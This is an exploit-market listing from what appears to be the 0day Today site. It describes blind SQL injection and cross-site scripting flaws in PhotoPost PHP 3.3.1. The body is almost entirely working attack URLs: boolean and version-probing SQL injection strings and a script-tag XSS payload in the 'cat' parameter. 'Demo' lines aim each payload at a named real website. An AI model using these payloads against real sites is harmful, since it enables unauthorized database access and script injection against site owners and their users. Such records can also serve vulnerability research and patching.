[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PhotoPost PHP 3.3.1 (XSS/bSQL) Multiple Remote Vulnerabilities

Author
599eme Man
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5637
Category
web applications
Date add
06-08-2009
Platform
unsorted
==============================================================
PhotoPost PHP 3.3.1 (XSS/bSQL) Multiple Remote Vulnerabilities
==============================================================


# [+] PhotoPost PHP 3.3.1 (XSS/bSQL) Multiple Remote Vulnerabilities
# [+] Software : PhotoPost PHP 3.3.1
# [+] Author : 599eme Man
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...
# [+] Special : Moudi my Brozazaaaaaaaaaaaa
#
#[------------------------------------------------------------------------------------]
# 
# [+] Vulnerability
#
#	[+] Blind
#
#		- http://www.site.com/showgallery.php?cat=[nr] and 1=1 <= True
#		- http://www.site.com/showgallery.php?cat=[nr] and 1=2 <= False
#
#		- http://www.site.com/showgallery.php?cat=[nr] and substring(@@version,1,1)=4 <= True
#		- http://www.site.com/showgallery.php?cat=[nr] and substring(@@version,1,1)=5 <= False
#
#			[+] Demo
#
#				- http://www.cloudynights.com/photopost/showgallery.php?cat=[nr] and 1=1 <= True
#				- http://www.cloudynights.com/photopost/showgallery.php?cat=[nr] and 1=2 <= False
#
#				- http://www.cloudynights.com/photopost/showgallery.php?cat=[nr] and substring(@@version,1,1)=4 <= True
#				- http://www.cloudynights.com/photopost/showgallery.php?cat=[nr] and substring(@@version,1,1)=5 <= False	
#
#	[+] XSS
#	
#		- http://www.site.com/showgallery.php?cat='"><script>alert('xss')</script>
#
#			[+] Demo
#
#				- http://www.cloudynights.com/photopost/showgallery.php?cat='"><script>alert('xss')</script>
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################



#  0day.today [2024-12-25]  #